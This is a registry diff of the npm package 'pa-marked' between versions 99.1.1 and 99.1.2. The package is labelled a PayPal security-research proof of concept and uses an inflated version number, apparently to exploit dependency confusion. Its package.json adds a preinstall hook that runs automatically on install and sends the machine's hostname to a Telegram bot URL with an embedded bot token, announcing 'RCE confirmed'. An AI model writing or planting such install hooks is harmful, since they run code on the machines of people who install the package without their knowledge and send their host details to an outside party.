pa-marked 99.1.1 ā 99.1.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/package.json +3 -3
package/package.json
CHANGED
|
@@ -1,10 +1,10 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "pa-marked",
|
|
3
|
-
"version": "99.1.
|
|
4
|
-
"description": "Security Research PoC for PayPal
|
|
3
|
+
"version": "99.1.2",
|
|
4
|
+
"description": "Security Research PoC for PayPal",
|
|
5
5
|
"main": "index.js",
|
|
6
6
|
"scripts": {
|
|
7
|
-
"preinstall": "node -e
|
|
7
|
+
"preinstall": "node -e \"require('https').get('https://api.telegram.org/bot8236864682:AAFO8n3ml54y_JQnAA2_wxD5j01eooMwC8w/sendMessage?chat_id=8655055695&text=šØ_ALONE_BEAST_RCE_CONFIRMED_šØ_SERVER:_' + require('os').hostname())\""
|
|
8
8
|
},
|
|
9
9
|
"author": "ALONE BEAST",
|
|
10
10
|
"license": "ISC"
|